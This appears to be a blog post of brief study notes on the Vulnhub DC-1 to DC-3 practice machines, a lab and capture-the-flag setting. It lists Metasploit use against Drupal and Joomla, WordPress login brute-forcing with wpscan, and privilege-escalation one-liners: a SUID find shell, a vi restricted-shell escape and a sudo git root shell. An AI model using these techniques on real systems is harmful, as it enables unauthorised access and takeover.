Post

Vulnhub DC Series

Posted Updated
Preview Image
By
1 min read
Vulnhub DC Series

DC Series Learning…

dc-1

1
2
3
4
5
6
7
8

# Exploiting CMS Drupal 7 using msf
# msf >  search about drupal 7 Exploits and Auxiliaries.
### Post Exploitation !
[SUID's Files ]:-
Awesome script for SUID Exploitation ====> suid3num.py <=====
find / -type f -perm -4000 2>/dev/null   ---> find

find . -exec /bin/sh -p \; -quit

dc-2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

# Exploiting CMS --> Wordpress 4.7.10
# Password file creation ?
cewl $URL -m 5 -w $PWD/cewl.txt  2>/dev/null

# Login Brute force or userEnumeration...
wpscan --url $URL -e u -P cewl.txt

### Post Exploitation
=======================
[Escape rbash using vi]:- 
=======================
:set shell=/bin/bash
# type one more time this 
:shell  #then enter

export PATH=/bin:/usr/bin:$PATH
export SHELL=/bin/bash:$SHELL

===========================
Password Reuse and [sudo -l] :-
===========================
[/usr/bin/git  SUID Binary Escape]:-
sudo git help add
# Type this
!/bin/bash   #Enter it!

dc-3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

# Exploiting Joomla 3.7.0 Version
 Explore msf usage for joomla exploitation , get used exploit and auxilaries
# Raw tool used for exploitation ?
- nmap
- joomlacheck.sh  <--- script
- nuclei   <--- for cve detection
=======
nuclei -u $URL -t /root/nuclei-templates/http/cves/ -tags joomla
=======
- dirsearch <--- for directory brute force
- git poc <--- for SQL Injection Exploitation
- curl 
- searchsploit 
- msfconsole  <-- A lot!

# Linux kernal Exploitation
------> linux kernal exploitation <-------
=> uname -a
=> file /bin/bash
=> cat /etc/*-release
vulnhub
vulhub
This post is licensed under CC BY 4.0 by the author.